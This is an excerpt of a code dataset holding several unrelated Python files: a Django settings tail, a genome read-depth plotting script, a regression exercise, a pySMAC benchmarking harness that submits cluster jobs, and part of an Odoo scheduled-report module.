'raven.contrib.django.raven_compat.handlers.SentryHandler', # noqa: E501\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n", "sub_path": "ymrj/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 5869, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "dj_database_url.config", "line_number": 113, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 120, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 138, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 142, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 150, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "408881983", "text": "#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport argparse\n\n#parse arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--wt_file_name', type=str)\nparser.add_argument('--tu_file_name', type=str)\nparser.add_argument('--window_size', default = 10000, type=int)\nargs = parser.parse_args()\n\n# function to read the depth file line by line\n# returns numpy arrays of chromosome types for each position, position index and the read-depth at the corresponding position\ndef read_depth_file(filename):\n f_depth = open(filename, \"r\")\n\n chromosomes, positions, reads = [], [], []\n while True: \n # Get next line from file\n line = f_depth.readline()\n # break the while cycle at the end of the file\n if not line:\n break\n \n # split the line and append values to the lists\n (chrom, pos, read) = line.split(\"\\t\")\n chromosomes.append(chrom), positions.append(int(pos)), reads.append(int(read))\n\n f_depth.close()\n return chromosomes, np.array(positions), np.array(reads)\n\n# function to plot the read depth averaged over a windows defined by window_size\n# save the plot in PNG file with name defined in im_name\ndef plot_read_depth(x, y, chrom, type_genome, window_size, color, im_name, ratio=False):\n # plot settings - size of figure, labels, title\n plt.figure(figsize=(15, 10))\n plt.plot(x/1000000, y, 'o', markersize=5, markeredgewidth=0.7, markeredgecolor=\"w\", color=color)\n\n plt.xlabel(f'Chromosome {chrom[0]} positions [Mb]')\n if not ratio:\n plt.ylabel('Read-depth') \n else:\n plt.ylabel('Log2 ratio') \n plt.title(f'Read depth {type_genome} (averaged every {window_size} bases)')\n plt.savefig(im_name)\n\n# function to take average of the reads (and positions) over the window - shoul be rigid against window size, which does not divide the length of the data\ndef average_over_window(x, y, window_size):\n # take modulo to deal with window size, which do not divide the length of the data\n mod = len(x) % window_size\n \n # take the reads without the values in the last window (if neccesary), get means of the windows\n # concatenate with mean of the last window\n if mod == 0:\n x_mean = np.mean(x.reshape(-1, window_size), axis=1) \n else:\n x_mean = np.mean(x[:-mod].reshape(-1, window_size), axis=1)\n x_mean_rest = np.array(np.mean(x[-mod:]))[np.newaxis] \n x_mean = np.concatenate((x_mean, x_mean_rest), axis=0)\n \n if mod == 0:\n y_mean = np.mean(y.reshape(-1, window_size), axis=1)\n else:\n y_mean = np.mean(y[:-mod].reshape(-1, window_size), axis=1)\n y_mean_rest = np.array(np.mean(y[-mod:]))[np.newaxis] \n y_mean = np.concatenate((y_mean, y_mean_rest), axis=0)\n return x_mean, y_mean\n\n# call all methods to produce the results\ndef main(args):\n # assign arguments\n wt_depth_filename = args.wt_file_name\n tu_depth_filename = args.tu_file_name\n window_size = args.window_size\n \n # read files into three numpy arrays\n wt_chromosomes, wt_positions, wt_reads = read_depth_file(wt_depth_filename)\n tu_chromosomes, tu_positions, tu_reads = read_depth_file(tu_depth_filename)\n \n # average the reads and positions over the windows \n wt_mean_positions, wt_mean_reads = average_over_window(wt_positions, wt_reads, window_size)\n tu_mean_positions, tu_mean_reads = average_over_window(tu_positions, tu_reads, window_size)\n \n # calculate log2 ratio, not dividing by zero\n log_ratio = np.log2(np.divide(tu_mean_reads, wt_mean_reads, where=wt_mean_reads!=0))\n \n # plot the data and save the final plots\n plot_read_depth(wt_mean_positions, wt_mean_reads, wt_chromosomes, \"of normal genome\", window_size, 'green', \"normal_depth.png\")\n plot_read_depth(tu_mean_positions, tu_mean_reads, tu_chromosomes, \"of tumor genome\", window_size, 'red', \"tumor_depth.png\")\n plot_read_depth(tu_mean_positions, log_ratio, tu_chromosomes, \"ratio\", window_size, 'blue', \"log2_ratio.png\", ratio=True)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args([] if \"__file__\" not in globals() else None)\n main(args)\n\n", "sub_path": "Assignment 1/depth_plot.py", "file_name": "depth_plot.py", "file_ext": "py", "file_size_in_byte": 4183, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "364094908", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.io\nimport math\n\n# Seed a random number generator\nseed = 12345\n# rng = np.random.RandomState(seed)\n\n'''\nEXERCISE 1\n'''\ndef process_data():\n amp_data = scipy.io.loadmat('amp_data.mat')\n amp_data_keys = amp_data['amp_data']\n # print(amp_data_keys)\n\n # x_grid = np.arange(start=0, stop=len(amp_data_keys), step=1)\n # plt.plot(x_grid, amp_data_keys,'b-') # linear plot\n # plt.hist(amp_data_keys, normed=True, bins=16) # histogram\n # plt.show()\n\n columns = 21\n rows = len(amp_data_keys) // columns\n data_set = amp_data_keys[:(rows*columns)]\n data_set = data_set.reshape((rows, columns))\n shuffled_data_set = shuffle_matrix(data_set)\n\n print (len(amp_data_keys))\n print (len(data_set))\n\n X_shuffle_train, X_shuffle_val, X_shuffle_test, y_shuffle_train, y_shuffle_val, y_shuffle_test = split_data(data=shuffled_data_set)\n\n print (X_shuffle_train.shape)\n print (X_shuffle_val.shape)\n print (X_shuffle_test.shape)\n\n print (y_shuffle_train.shape)\n print (y_shuffle_val.shape)\n print (y_shuffle_test.shape)\n\n '''\n EXERCISE 2\n '''\n # fit_curve(X=X_shuffle_train[0], yy=y_shuffle_train[0])\n\n '''\n EXERCISE 3\n '''\n choose_polynomial(X=X_shuffle_train[0], yy=y_shuffle_train[0])\n\n\n\n # q = [12, 232, 34, 323, 421, 544, 63, 23, 75, 6833, 5324, 453, 34, 31, 797, 313, 1213, 89]\n # q = np.array(q).reshape(6,3)\n # for i in range(3):\n # sh = shuffle_matrix(q)\n # print (sh)\n\n\n # # Reset random number generator and data provider states on each run\n # # to ensure reproducibility of results\n # rng.seed(seed)\n # train_data.reset()\n # valid_data.reset()\n\n\n\n# Split data into training, validation and test sets (UNUSED)\ndef split_data(data):\n p = math.floor(len(data) / 20 * 3) # 15% (validation set / testing set)\n r = len(data) - 2 * p # 80% (training set)\n\n training_data = (data[:r]) # training_data\n validation_data = (data[r:r+p]) # validation_data\n testing_data = (data[r+p:r+p+p]) # testing_data\n\n X_shuffle_train = training_data[:,:-1]\n y_shuffle_train = training_data[:,-1]\n\n X_shuffle_val = validation_data[:,:-1]\n y_shuffle_val = validation_data[:,-1]\n\n X_shuffle_test = testing_data[:,:-1]\n y_shuffle_test = testing_data[:,-1]\n\n return X_shuffle_train, X_shuffle_val, X_shuffle_test, y_shuffle_train, y_shuffle_val, y_shuffle_test\n\n\ndef shuffle_matrix(mat):\n np.random.seed(seed)\n shuffled_mat = np.random.permutation(mat)\n\n # print (mat)\n # print (shuffled_mat)\n return shuffled_mat\n\n\ndef fit_and_plot(phi_fn, type, X, yy, last_point, draw_type, D):\n w_fit = np.linalg.lstsq(phi_fn(X), yy, rcond=0)[0] # (D+1,)\n X_grid = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, 1)\n f_grid = np.dot(phi_fn(X_grid), w_fit) # (N,)\n\n\n est_value = last_point[0] * w_fit[1] + w_fit[0]\n print (\"Estimated value for\", type, \":\", est_value[0])\n\n # plt.clf()\n plt.plot(X, yy, 'r.')\n plt.plot(last_point[0], last_point[1], 'b.')\n plt.plot(X_grid, f_grid, draw_type)\n # plt.show()\n\ndef phi_linear(X_in):\n return np.insert(X_in, 0, 1, axis=-1)\n\ndef phi_quartic(X_in):\n return np.concatenate([np.ones(X_in.shape), X_in, X_in**2, X_in**3, X_in**4], axis=-1)\n\n'''\nEXERCISE 2\n'''\ndef fit_curve(X, yy):\n X = X.reshape(20,1)\n yy = yy.reshape(1,1)\n D = X.shape[1] # N = 1, D = 20\n\n # y_data = X # (N, D) - (20, 1)\n t = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, D) - (20, 1)\n # print (\"T: \", t)\n # x_data = np.insert(t, 0, np.ones(t.shape[0]), axis=1) # (N, D+1) - (20, 2)\n #\n # # print (\"X: \", X.shape)\n # # print (\"Y: \", yy.shape)\n # w_fit = np.linalg.lstsq(x_data, y_data)[0] # (D,)\n # # X_grid = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, D)\n # # f_grid = np.dot(X_grid, w_fit) # (N,)\n # plt.clf()\n # plt.plot(t, y_data, 'r.')\n # # plt.ylim(-0.210540, -0.210530)\n # plt.show()\n\n print (\"Expected value: \", yy[0][0])\n\n print (\"USING ALL DATA\")\n plt.clf()\n fit_and_plot(phi_fn=phi_linear, type='linear', X=t, yy=X, last_point=(1, yy[0]), draw_type='g-', D=D)\n fit_and_plot(phi_fn=phi_quartic, type='quartic', X=t, yy=X, last_point=(1, yy[0]), draw_type='y-', D=D)\n plt.show()\n\n print (\"USING JUST THE LAST TWO POINTS\")\n plt.clf()\n fit_and_plot(phi_fn=phi_linear, type='linear', X=t[-2:], yy=X[-2:], last_point=(1, yy[0]), draw_type='g-', D=D)\n fit_and_plot(phi_fn=phi_quartic, type='quartic', X=t[-2:], yy=X[-2:], last_point=(1, yy[0]), draw_type='y-', D=D)\n plt.show()\n\n\ndef Phi(C, K, t):\n def phi(X_in, C, K):\n arr = np.ones((C, 1))\n for i in range(K):\n arr = np.hstack((arr, X_in**(i+1)))\n return arr\n\n res = phi(t, C, K)\n print (res)\n return res\n\n\n'''\nEXERCISE 3\n'''\ndef choose_polynomial(X, yy):\n X = X.reshape(20,1)\n D = X.shape[1]\n t = np.arange(start=0, stop=1, step=0.05).reshape(-1, D)\n Phi(t, 3, 4)\n\n\n\n\n\nif __name__ == '__main__':\n process_data()\n", "sub_path": "assignment1.py", "file_name": "assignment1.py", "file_ext": "py", "file_size_in_byte": 5228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scipy.io.loadmat", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 15, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.linalg.lstsq", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.insert", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "514182315", "text": "'''\n\npySMAC 0.9.1 Installation:\n\nURL: https://github.com/automl/pysmac\nINSTALLATION: pip install git+https://github.com/automl/pysmac.git --user\n'''\n\nimport os\nimport sys\nimport copy\nimport types\nimport random\nimport pysmac\nimport itertools\nimport subprocess\nimport scipy.stats\nimport numpy as np\nimport portable_pal as pal\n\nif sys.version_info[0] == 2:\n import cPickle as pickle\nelif sys.version_info[0] == 3:\n import _pickle as pickle\nelse:\n raise Exception(\"Error - Unknown python version!\")\n\n\ndef f_min_obj_2(x0, x1, x2):\n return f_min_obj([x0, x1, x2])\n\n\ndef f_min_obj(x_int):\n # The actual function we are optimizing. As we are minimizing,\n # and all data is actually the negated be, we need to return\n # the negative of the actually stored value\n data_x, data_y, combos, solvent_dict = f_min_obj.func_data\n index = f_min_obj.index\n\n x2 = solvent_dict[x_int[2]]\n\n sample = combos[x_int[0]] + [int(x_int[1]), int(x2)]\n\n for i, d in enumerate(data_x):\n if all([x == y for x, y in zip(sample, d)]):\n v = 1.0 * data_y[i]\n os.system(\"echo %f >> tmp_%d.dat\" % (v, index))\n return -1.0 * v\n\n raise Exception(\"NOT FOUND\")\n\n\ndef run_replication(index, x0, x1, x2, N_POINTS, func_data):\n # Setup and run our replication\n parameters = {\n \"x0\": (\"categorical\", x0, random.randint(0, 9)),\n \"x1\": (\"categorical\", x1, random.randint(0, 2)),\n \"x2\": (\"categorical\", x2, random.choice(x2))\n }\n if os.path.exists(\"tmp_%d.dat\" % index):\n os.remove(\"tmp_%d.dat\" % index)\n opt = pysmac.SMAC_optimizer()\n f_min_obj.func_data = func_data\n f_min_obj.index = index\n\n xmin, fval = opt.minimize(f_min_obj_2, N_POINTS, parameters)\n\n best_y = [float(s) for s in open(\"tmp_%d.dat\" % index).read().strip().split('\\n')]\n\n os.remove(\"tmp_%d.dat\" % index)\n # Assuming there is a possibility of converging sooner than all datapoints,\n # we will pad the ending of best_y with the best observed so far\n if len(best_y) != N_POINTS:\n best_y = best_y + [max(best_y) for _ in range(N_POINTS - len(best_y))]\n\n return best_y\n\n\ndef submit_job(run):\n '''\n This code will submit a job to the NBS queueing system so we can run our\n benchmarks in parallel!\n '''\n # Python script to run our replication\n py_script = '''\nfrom run_pysmac import run_replication\nimport cPickle as pickle\n\ndata = pickle.load(open(\"queue_helper/$INDEX_pysmac.pickle\", 'rb'))\nbest_y = run_replication(*data)\n\npickle.dump(best_y, open(\"queue_helper/$INDEX_rep.out\", 'wb'))\n'''\n fptr = open(\"%d_rep.py\" % run, 'w')\n fptr.write(py_script.replace(\"$INDEX\", str(run)))\n fptr.close()\n\n # Submission script for this job (NBS)\n sub_script = '''\n##NBS-name: \"$INDEX_rep\"\n##NBS-nproc: 1\n##NBS-queue: \"bigmem\"\n\nsource /fs/home/$USER/.zshrc\n\n/fs/home/hch54/anaconda/bin/python2.7 -u $CUR_DIR/$INDEX_rep.py > $CUR_DIR/$INDEX_rep.log 2>&1\n'''\n while \"$INDEX\" in sub_script:\n sub_script = sub_script.replace(\"$INDEX\", str(run))\n while \"$CUR_DIR\" in sub_script:\n sub_script = sub_script.replace(\"$CUR_DIR\", os.getcwd())\n name = \"%d_rep\" % run\n fptr = open(\"%s.nbs\" % name, 'w')\n fptr.write(sub_script)\n fptr.close()\n\n # Submit job\n job_pipe = subprocess.Popen('jsub %s.nbs' % name, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n job_err = job_pipe.stderr.read()\n\n if \"+notunique:\" in job_err:\n raise Exception(\"Job with name %s already exists in the queue!\" % name)\n\n job_id = job_pipe.stdout.read()\n job_id = job_id.split(\"submitted to queue\")[0].split()[-1][2:-1]\n running_job = pal.Job(name, job_id=job_id)\n\n # Here we define a function to attach to the job class.\n def get_best_y(self):\n if not self.is_finished():\n self.wait()\n\n return pickle.load(open(\"queue_helper/%s.out\" % self.name, 'rb'))\n\n # Attach the function\n running_job.get_best_y = types.MethodType(get_best_y, running_job)\n\n return running_job\n\n\ndef run_pysmac(dataset, stats, NUM_RUNS=1000, on_queue=False):\n # -------------------------------------------------------------------------------------------------\n\n # Off-the-shelf BO (EI with GP model, no statistical model though)\n # http://www.jmlr.org/papers/volume16/neumann15a/neumann15a.pdf\n\n # Read in all the data points\n data = pickle.load(open(\"all_data.pickle\", 'rb'))\n N_POINTS = len(data)\n\n data_x = [\n [row.index(1), row[3:].index(1), row[6:].index(1), row[9:].index(1), row[-2]]\n for row in data\n ]\n data_y = [row[-1] for row in data]\n combos = sorted([list(x) for x in list(set([tuple(sorted(v)) for v in itertools.product(range(3), repeat=3)]))])\n\n solvent_dict = {\n 46.7: 0,\n 36.7: 1,\n 32.3: 2,\n 40.24: 3,\n 20.7: 4,\n 10.9: 5,\n 42.84: 6,\n 35.9: 7\n }\n\n func_data = [data_x, data_y, combos, solvent_dict]\n\n # Ensure folders are as they should be\n if on_queue:\n if not os.path.isdir(\"queue_helper\"):\n os.mkdir(\"queue_helper\")\n else:\n os.system(\"rm queue_helper/*\")\n\n # -------------------------------------------------------------------------------------------------\n\n each_run = []\n\n # Initialize our variable ranges\n x0 = list(range(10))\n x1 = list(range(3))\n x2 = sorted(solvent_dict.keys())\n\n # Run all replications\n jobs_on_queue = []\n for i in range(NUM_RUNS):\n dump_obj = [i, x0, x1, x2, N_POINTS, func_data]\n if not on_queue:\n pal.printProgressBar(i, NUM_RUNS, prefix=\"Running pySMAC case...\")\n best_y = run_replication(*dump_obj)\n each_run.append(best_y)\n else:\n pickle.dump(dump_obj, open(\"queue_helper/%d_pysmac.pickle\" % i, 'wb'))\n jobs_on_queue.append(submit_job(i))\n\n if on_queue:\n for run, j in enumerate(jobs_on_queue):\n pal.printProgressBar(run, NUM_RUNS, prefix=\"Running pySMAC case...\")\n\n best_y = j.get_best_y()\n each_run.append(copy.deepcopy(best_y))\n\n # Delete the old files\n os.system(\"rm %d_rep.*\" % run)\n\n # Parse the output data\n all_runs = [\n [max(r[:i + 1]) if i > 0 else x for i, x in enumerate(r)]\n for r in each_run\n ]\n\n n_to_max = []\n for this_run in all_runs:\n n_to_max.append(this_run.index(max(this_run)))\n\n each_run = np.array(all_runs)\n\n dataset[\"SMAC\"] = [\n np.array([np.mean(each_run[:, i]) for i in range(N_POINTS)]),\n np.array([scipy.stats.sem(each_run[:, i]) for i in range(N_POINTS)])\n ]\n\n stats[\"SMAC\"] = [n_to_max, N_POINTS]\n\n # Save all output\n pickle.dump(dataset[\"SMAC\"], open(\"out/d_smac.dat\", 'wb'))\n pickle.dump(each_run, open(\"out/best_smac.dat\", 'wb'))\n\n pal.printProgressBar(NUM_RUNS, NUM_RUNS, prefix=\"Running pySMAC case...\", suffix=\"Done\")\n return dataset, stats\n\n\nif __name__ == \"__main__\":\n print(\"Running pySMAC for only one replication! If you wish to do a full run, please use the run.py code.\")\n dataset, stats = run_pysmac({}, {}, NUM_RUNS=1, on_queue=False)\n", "sub_path": "code/run_pysmac.py", "file_name": "run_pysmac.py", "file_ext": "py", "file_size_in_byte": 7176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.version_info", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 61, "usage_type": "call"}, {"api_name": "pysmac.SMAC_optimizer", "line_number": 62, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 70, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 118, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "portable_pal.Job", "line_number": 126, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 133, "usage_type": "call"}, {"api_name": "types.MethodType", "line_number": 136, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 148, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 174, "usage_type": "call"}, {"api_name": "os.system", "line_number": 176, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 192, "usage_type": "call"}, {"api_name": "_pickle.dump", "line_number": 196, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 201, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 204, "usage_type": "call"}, {"api_name": "os.system", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.stats.stats.sem", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.stats.stats", "line_number": 223, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 223, "usage_type": "name"}, {"api_name": "_pickle.dump", "line_number": 229, "usage_type": "call"}, {"api_name": "_pickle.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 232, "usage_type": "call"}]} +{"seq_id": "18148498", "text": "# -*- coding: utf-8 -*-\nimport StringIO\nfrom collections import deque\nfrom odoo.tools import config\nfrom datetime import datetime, timedelta\nfrom odoo import models, fields, api, SUPERUSER_ID\nfrom odoo.tools import ustr\nimport os\n\ntry:\n import xlwt\nexcept ImportError:\n xlwt = None\n\nclass auto_send_report(models.Model):\n _name = 'auto_send_report.config'\n\n @api.model\n def _list_all_models(self):\n self.env.cr.execute(\"\"\"\n SELECT\n model, name\n FROM\n ir_model\n WHERE\n transient = False\n ORDER BY\n name\n \"\"\")\n return self.env.cr.fetchall()\n\n reporting_id = fields.Selection(_list_all_models, string='Reporting', required=True)\n filter_id = fields.Many2one('ir.filters', string='Filter', required=True)\n measure_ids = fields.Many2many('ir.model.fields', domain=[('name','!=','id'),'|',('ttype','=','float'),('ttype','=','integer')], string='Measures', required=True)\n recipient_ids = fields.Many2many('res.partner', string='Recipients', domain=[('email', '!=', False)], required=True)\n sending_frequency = fields.Selection([\n ('daily', 'Daily'),\n ('weekly', 'Weekly'),\n ('monthly', 'Monthly'),\n ], string='Sending Frequency', required=True)\n next_date = fields.Date('Next Date', required=True, default= lambda self: fields.Date.today())\n\n @api.multi\n def run_scheduler_send(self):\n allow_send_ids = []\n\n reports = self.search([])\n for report in reports:\n if not report.next_date:\n allow_send_ids.append(report.id)\n else:\n next_date = datetime.strptime(report.next_date, '%Y-%m-%d')\n today = datetime.strptime(fields.Date.today(), '%Y-%m-%d')\n\n timediff = next_date - today\n if timediff.total_seconds() <= 0:\n allow_send_ids.append(report.id)\n if len(allow_send_ids) > 0:\n allowes = self.browse(allow_send_ids)\n allowes.sending_report()\n allowes.update_next_time()\n return True\n\n @api.multi\n def update_next_time(self):\n for report in self:\n today = datetime.strptime(fields.Date.today(), '%Y-%m-%d')\n\n delta = timedelta(days=+1)\n if report.sending_frequency == 'weekly':\n delta = timedelta(days=+7)\n elif report.sending_frequency == 'monthly':\n delta = timedelta(months=+1)\n\n next_date = today + delta\n report.write({\n 'next_date': next_date.strftime('%Y-%m-%d')\n })\n\n @api.multi\n def sending_report(self):\n for report in self:\n report_data = report.get_report_data()\n excel_path = self.export_xls(report_data)\n report.send_email(excel_path)\n return True\n\n @api.model\n def build_data(self):\n return {\n 'headers': self.build_headers(),\n 'measure_row': self.build_measure_row(),\n 'nbr_measures': self.get_measure_lenth(),\n 'rows': self.build_rows(),\n 'title': self.reporting_id,\n }\n\n @api.model\n def build_headers(self):\n report_obj = self.env.get(self.reporting_id)\n\n filter_context = eval(self.filter_id.context)\n if not filter_context:\n filter_context = {}\n\n pivot_measures = filter_context.get('pivot_measures', [])\n pivot_row_groupby = filter_context.get('pivot_row_groupby', [])\n pivot_column_groupby = filter_context.get('pivot_column_groupby', [])\n\n fields = []\n for measure in pivot_measures:\n fields.append(measure.split(':')[0])\n for row in pivot_row_groupby:\n fields.append(row.split(':')[0])\n for column in pivot_column_groupby:\n fields.append(column.split(':')[0])\n\n domain = eval(self.filter_id.domain)\n if not domain:\n domain = []\n\n measures = []\n group_labels = []\n for group_field in pivot_column_groupby:\n group_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n for group_item in group_data:\n for measure in pivot_measures:\n if measure == '__count__':\n measures.append({\n 'width': 1,\n 'height': 1,\n 'title': 'count',\n # 'id': '2216',\n 'expanded': False\n })\n else:\n measures.append({\n 'width': 1,\n 'height': 1,\n 'title': measure,\n # 'id': 